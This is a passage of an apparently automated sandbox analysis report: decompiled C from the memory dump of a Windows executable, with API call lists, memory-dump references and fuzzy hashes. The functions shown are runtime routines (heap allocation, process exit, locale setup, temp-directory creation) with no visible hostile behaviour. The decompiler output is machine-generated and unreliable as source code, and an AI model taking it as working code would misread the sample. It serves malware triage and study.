                                                            											continue;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            							goto L5;
                                                            						}
                                                            					}
                                                            					L5:
                                                            					__edx =  *(__ebx + 8);
                                                            					__eax =  *(__edx + 0x10);
                                                            					__ecx = 0xfffffff8;
                                                            					__eflags = __edx - __ebx;
                                                            					if(__edx == __ebx) {
                                                            						__edx =  *(__ebx + 0x18);
                                                            						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                            						__eflags = __eax -  *(__ebx + 0x14);
                                                            						if(__eax >  *(__ebx + 0x14)) {
                                                            							_push(__esi);
                                                            							_push(__edi);
                                                            							__eflags =  *0x4bb059;
                                                            							if(__eflags != 0) {
                                                            								while(1) {
                                                            									__eax = 0x100;
                                                            									asm("lock cmpxchg [0x4bbae8], ah");
                                                            									if(__eflags == 0) {
                                                            										goto L22;
                                                            									}
                                                            									asm("pause");
                                                            									__eflags =  *0x4bb989;
                                                            									if(__eflags != 0) {
                                                            										continue;
                                                            									} else {
                                                            										Sleep(0);
                                                            										__eax = 0x100;
                                                            										asm("lock cmpxchg [0x4bbae8], ah");
                                                            										if(__eflags != 0) {
                                                            											Sleep(0xa);
                                                            											continue;
                                                            										}
                                                            									}
                                                            									goto L22;
                                                            								}
                                                            							}
                                                            							L22:
                                                            							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
                                                            							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
                                                            							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
                                                            								__ecx =  *(__ebx + 4) & 0x0000ffff;
                                                            								__edi =  *0x4bbaf0; // 0x0
                                                            								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
                                                            								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
                                                            									__eax =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edi = __eax;
                                                            									__eax = E00403BCC(__eax);
                                                            									__esi = __eax;
                                                            									__eflags = __eax;
                                                            									if(__eax != 0) {
                                                            										goto L35;
                                                            									} else {
                                                            										 *0x4bbae8 = __al;
                                                            										 *__ebx = __al;
                                                            										_pop(__edi);
                                                            										_pop(__esi);
                                                            										_pop(__ebx);
                                                            										return __eax;
                                                            									}
                                                            								} else {
                                                            									__esi =  *0x4bbaec; // 0x22aaad0
                                                            									__ecx =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edx = __ecx + 0xb30;
                                                            									__eflags = __edi - __ecx + 0xb30;
                                                            									if(__edi >= __ecx + 0xb30) {
                                                            										__edi = __ecx;
                                                            									}
                                                            									__esi = __esi - __edi;
                                                            									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
                                                            									 *0x4bbaec = __esi;
                                                            									goto L35;
                                                            								}
                                                            							} else {
                                                            								asm("bsf eax, esi");
                                                            								__esi = __eax * 8;
                                                            								__ecx =  *(0x4bbaf8 + __eax * 4);
                                                            								asm("bsf ecx, ecx");
                                                            								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
                                                            								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
                                                            								__esi =  *(__edi + 4);
                                                            								__edx =  *(__esi + 4);
                                                            								 *(__edi + 4) = __edx;
                                                            								 *__edx = __edi;
                                                            								__eflags = __edi - __edx;
                                                            								if(__edi == __edx) {
                                                            									__edx = 0xfffffffe;
                                                            									asm("rol edx, cl");
                                                            									_t38 = 0x4bbaf8 + __eax * 4;
                                                            									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
                                                            									__eflags =  *_t38;
                                                            									if( *_t38 == 0) {
                                                            										asm("btr [0x4bbaf4], eax");
                                                            									}
                                                            								}
                                                            								__edi = 0xfffffff0;
                                                            								__edi = 0xfffffff0 &  *(__esi - 4);
                                                            								__eflags = 0xfffffff0 - 0x10a60;
                                                            								if(0xfffffff0 < 0x10a60) {
                                                            									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                            									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                            									__eflags =  *_t52;
                                                            								} else {
                                                            									__edx = __edi;
                                                            									__edi =  *(__ebx + 6) & 0x0000ffff;
                                                            									__edx = __edx - __edi;
                                                            									__eax = __edi + __esi;
                                                            									__ecx = __edx + 3;
                                                            									 *(__eax - 4) = __ecx;
                                                            									 *(__edx + __eax - 8) = __edx;
                                                            									__eax = E00403B00(__eax, __ecx, __edx);
                                                            								}
                                                            								L35:
                                                            								_t56 = __edi + 6; // 0x6
                                                            								__ecx = _t56;
                                                            								 *(__esi - 4) = _t56;
                                                            								__eax = 0;
                                                            								 *0x4bbae8 = __al;
                                                            								 *__esi = __ebx;
                                                            								 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                            								 *((intOrPtr*)(__esi + 0x14)) = 1;
                                                            								 *(__ebx + 0x18) = __esi;
                                                            								_t61 = __esi + 0x20; // 0x22aaaf0
                                                            								__eax = _t61;
                                                            								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            								__edx = __ecx + __eax;
                                                            								 *(__ebx + 0x10) = __ecx + __eax;
                                                            								__edi = __edi + __esi;
                                                            								__edi = __edi - __ecx;
                                                            								__eflags = __edi;
                                                            								 *(__ebx + 0x14) = __edi;
                                                            								 *__ebx = 0;
                                                            								 *(__eax - 4) = __esi;
                                                            								_pop(__edi);
                                                            								_pop(__esi);
                                                            								_pop(__ebx);
                                                            								return __eax;
                                                            							}
                                                            						} else {
                                                            							_t19 = __edx + 0x14;
                                                            							 *_t19 =  *(__edx + 0x14) + 1;
                                                            							__eflags =  *_t19;
                                                            							 *(__ebx + 0x10) = __ecx;
                                                            							 *__ebx = 0;
                                                            							 *(__eax - 4) = __edx;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					} else {
                                                            						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
                                                            						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                            						__eflags = 0xfffffff8;
                                                            						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
                                                            						 *(__eax - 4) = __edx;
                                                            						if(0xfffffff8 == 0) {
                                                            							__ecx =  *(__edx + 8);
                                                            							 *(__ecx + 0xc) = __ebx;
                                                            							 *(__ebx + 8) = __ecx;
                                                            							 *__ebx = 0;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						} else {
                                                            							 *__ebx = 0;
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					}
                                                            				}
                                                            			}






























                                                            0x004040e0
                                                            0x004040e3
                                                            0x004040ea
                                                            0x004040ed
                                                            0x004040ed
                                                            0x004040f0
                                                            0x004040f4
                                                            0x004040f7
                                                            0x004040fa
                                                            0x004040fc
                                                            0x004040fc
                                                            0x004040fe
                                                            0x00404101
                                                            0x00404104
                                                            0x00404107
                                                            0x00404108
                                                            0x00404109
                                                            0x0040410a
                                                            0x0040410a
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f46
                                                            0x00403f4a
                                                            0x00403f4d
                                                            0x00403f50
                                                            0x00403f53
                                                            0x00403f54
                                                            0x00403f54
                                                            0x00403f21
                                                            0x00403f21
                                                            0x00403f25
                                                            0x00403f25
                                                            0x00403f28
                                                            0x00403f2b
                                                            0x00403f2e
                                                            0x00403f58
                                                            0x00403f5b
                                                            0x00403f5e
                                                            0x00403f61
                                                            0x00403f64
                                                            0x00403f65
                                                            0x00403f30
                                                            0x00403f30
                                                            0x00403f33
                                                            0x00403f34
                                                            0x00403f34
                                                            0x00403f2e
                                                            0x00403f1f

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                            • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                            • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                            • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00407750() {
                                                            				void* _t20;
                                                            				void* _t23;
                                                            				intOrPtr _t31;
                                                            				intOrPtr* _t33;
                                                            				void* _t46;
                                                            				struct HINSTANCE__* _t49;
                                                            				void* _t56;
                                                            
                                                            				if( *0x4b7004 != 0) {
                                                            					E00407630();
                                                            					E004076B8(_t46);
                                                            					 *0x4b7004 = 0;
                                                            				}
                                                            				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
                                                            					E00407388(0x4bdbc8);
                                                            					E0040768C(0x4bdbc8);
                                                            				}
                                                            				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
                                                            					L8:
                                                            					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
                                                            						 *0x004BDBA4 = 0;
                                                            					}
                                                            					if( *((char*)(0x4bdbc0)) != 0) {
                                                            						L14:
                                                            						E004073B0();
                                                            						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
                                                            							_t15 =  *0x004BDBA8;
                                                            							if( *0x004BDBA8 != 0) {
                                                            								E0040B40C(_t15);
                                                            								_t31 =  *((intOrPtr*)(0x4bdba8));
                                                            								_t8 = _t31 + 0x10; // 0x400000
                                                            								_t49 =  *_t8;
                                                            								_t9 = _t31 + 4; // 0x400000
                                                            								if(_t49 !=  *_t9 && _t49 != 0) {
                                                            									FreeLibrary(_t49);
                                                            								}
                                                            							}
                                                            						}
                                                            						E00407388(0x4bdb98);
                                                            						if( *((char*)(0x4bdbc0)) == 1) {
                                                            							 *0x004BDBBC();
                                                            						}
                                                            						if( *((char*)(0x4bdbc0)) != 0) {
                                                            							E0040768C(0x4bdb98);
                                                            						}
                                                            						if( *0x4bdb98 == 0) {
                                                            							if( *0x4bb038 != 0) {
                                                            								 *0x4bb038();
                                                            							}
                                                            							ExitProcess( *0x4b7000); // executed
                                                            						}
                                                            						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
                                                            						_t56 = _t56 + 0xc;
                                                            						0x4b7000 = 0x4b7000;
                                                            						0x4bdb98 = 0x4bdb98;
                                                            						goto L8;
                                                            					} else {
                                                            						_t20 = E004054B4();
                                                            						_t44 = _t20;
                                                            						if(_t20 == 0) {
                                                            							goto L14;
                                                            						} else {
                                                            							goto L13;
                                                            						}
                                                            						do {
                                                            							L13:
                                                            							E00405CE8(_t44);
                                                            							_t23 = E004054B4();
                                                            							_t44 = _t23;
                                                            						} while (_t23 != 0);
                                                            						goto L14;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t33 =  *0x4bb054; // 0x0
                                                            						 *0x4bb054 = 0;
                                                            						 *_t33();
                                                            					} while ( *0x4bb054 != 0);
                                                            					L8:
                                                            					while(1) {
                                                            					}
                                                            				}
                                                            			}











                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                            • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                            • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                            • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00407748() {
                                                            				intOrPtr* _t14;
                                                            				void* _t23;
                                                            				void* _t26;
                                                            				intOrPtr _t34;
                                                            				intOrPtr* _t36;
                                                            				void* _t50;
                                                            				struct HINSTANCE__* _t53;
                                                            				void* _t62;
                                                            
                                                            				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
                                                            				if( *0x4b7004 != 0) {
                                                            					E00407630();
                                                            					E004076B8(_t50);
                                                            					 *0x4b7004 = 0;
                                                            				}
                                                            				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
                                                            					E00407388(0x4bdbc8);
                                                            					E0040768C(0x4bdbc8);
                                                            				}
                                                            				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
                                                            					L9:
                                                            					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
                                                            						 *0x004BDBA4 = 0;
                                                            					}
                                                            					if( *((char*)(0x4bdbc0)) != 0) {
                                                            						L15:
                                                            						E004073B0();
                                                            						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
                                                            							_t18 =  *0x004BDBA8;
                                                            							if( *0x004BDBA8 != 0) {
                                                            								E0040B40C(_t18);
                                                            								_t34 =  *((intOrPtr*)(0x4bdba8));
                                                            								_t8 = _t34 + 0x10; // 0x400000
                                                            								_t53 =  *_t8;
                                                            								_t9 = _t34 + 4; // 0x400000
                                                            								if(_t53 !=  *_t9 && _t53 != 0) {
                                                            									FreeLibrary(_t53);
                                                            								}
                                                            							}
                                                            						}
                                                            						E00407388(0x4bdb98);
                                                            						if( *((char*)(0x4bdbc0)) == 1) {
                                                            							 *0x004BDBBC();
                                                            						}
                                                            						if( *((char*)(0x4bdbc0)) != 0) {
                                                            							E0040768C(0x4bdb98);
                                                            						}
                                                            						if( *0x4bdb98 == 0) {
                                                            							if( *0x4bb038 != 0) {
                                                            								 *0x4bb038();
                                                            							}
                                                            							ExitProcess( *0x4b7000); // executed
                                                            						}
                                                            						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
                                                            						_t62 = _t62 + 0xc;
                                                            						0x4b7000 = 0x4b7000;
                                                            						0x4bdb98 = 0x4bdb98;
                                                            						goto L9;
                                                            					} else {
                                                            						_t23 = E004054B4();
                                                            						_t48 = _t23;
                                                            						if(_t23 == 0) {
                                                            							goto L15;
                                                            						} else {
                                                            							goto L14;
                                                            						}
                                                            						do {
                                                            							L14:
                                                            							E00405CE8(_t48);
                                                            							_t26 = E004054B4();
                                                            							_t48 = _t26;
                                                            						} while (_t26 != 0);
                                                            						goto L15;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t36 =  *0x4bb054; // 0x0
                                                            						 *0x4bb054 = 0;
                                                            						 *_t36();
                                                            					} while ( *0x4bb054 != 0);
                                                            					L9:
                                                            					while(1) {
                                                            					}
                                                            				}
                                                            			}












                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                            • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                            • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                            • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E004B5000(void* __ecx, void* __edx) {
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t22;
                                                            
                                                            				_push(_t22);
                                                            				_push(0x4b50d7);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t22;
                                                            				 *0x4bb98c =  *0x4bb98c - 1;
                                                            				if( *0x4bb98c < 0) {
                                                            					E00405B74();
                                                            					E004051A8();
                                                            					SetThreadLocale(0x400); // executed
                                                            					E0040A250();
                                                            					 *0x4b700c = 2;
                                                            					 *0x4bb01c = 0x4036b0;
                                                            					 *0x4bb020 = 0x4036b8;
                                                            					 *0x4bb05a = 2;
                                                            					 *0x4bb060 = E0040CAA4();
                                                            					 *0x4bb008 = 0x4095a0;
                                                            					E00405BCC(E00405BB0());
                                                            					 *0x4bb068 = 0xd7b0;
                                                            					 *0x4bb344 = 0xd7b0;
                                                            					 *0x4bb620 = 0xd7b0;
                                                            					 *0x4bb050 = GetCommandLineW();
                                                            					 *0x4bb04c = E00403810();
                                                            					 *0x4bb97c = GetACP();
                                                            					 *0x4bb980 = 0x4b0;
                                                            					 *0x4bb044 = GetCurrentThreadId();
                                                            					E0040CAB8();
                                                            				}
                                                            				_pop(_t19);
                                                            				 *[fs:eax] = _t19;
                                                            				_push(0x4b50de);
                                                            				return 0;
                                                            			}






                                                            APIs
                                                            • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                              • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                              • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                              • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                            • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                              • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                            • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                            • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                              • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                            • String ID:
                                                            • API String ID: 2740004594-0
                                                            • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                            • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                            • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                            • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char* _v16;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				int _t30;
                                                            				intOrPtr _t63;
                                                            				void* _t71;
                                                            				void* _t73;
                                                            				intOrPtr _t75;
                                                            				intOrPtr _t76;
                                                            
                                                            				_t71 = __edi;
                                                            				_t54 = __ebx;
                                                            				_t75 = _t76;
                                                            				_t55 = 4;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t55 = _t55 - 1;
                                                            				} while (_t55 != 0);
                                                            				_push(_t55);
                                                            				_push(__ebx);
                                                            				_t73 = __eax;
                                                            				_t78 = 0;
                                                            				_push(_t75);
                                                            				_push(0x4af0e1);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t76;
                                                            				while(1) {
                                                            					E00422D70( &_v12, _t54, _t55, _t78); // executed
                                                            					_t55 = L".tmp";
                                                            					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
                                                            					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
                                                            					if(_t30 != 0) {
                                                            						break;
                                                            					}
                                                            					_t54 = GetLastError();
                                                            					_t78 = _t54 - 0xb7;
                                                            					if(_t54 != 0xb7) {
                                                            						E00426F08(0x3d,  &_v32, _v8);
                                                            						_v28 = _v32;
                                                            						E00419E18( &_v36, _t54, 0);
                                                            						_v24 = _v36;
                                                            						E004232EC(_t54,  &_v40);
                                                            						_v20 = _v40;
                                                            						E00426ED8(0x81, 2,  &_v28,  &_v16);
                                                            						_t55 = _v16;
                                                            						E0041F264(_v16, 1);
                                                            						E0040711C();
                                                            					}
                                                            				}
                                                            				E00407E00(_t73, _v8);
                                                            				__eflags = 0;
                                                            				_pop(_t63);
                                                            				 *[fs:eax] = _t63;
                                                            				_push(E004AF0E8);
                                                            				E00407A80( &_v40, 3);
                                                            				return E00407A80( &_v16, 3);
                                                            			}



















                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                            • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                            • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                            • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                            				WCHAR* _v8;
                                                            				void* _t13;
                                                            				struct HWND__* _t24;
                                                            				WCHAR* _t29;
                                                            				long _t32;
                                                            
                                                            				_v8 = _t29;
                                                            				_t32 = __eax;
                                                            				_t13 = E00405740();
                                                            				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                            				E00405730(_t13);
                                                            				return _t24;
                                                            			}









                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
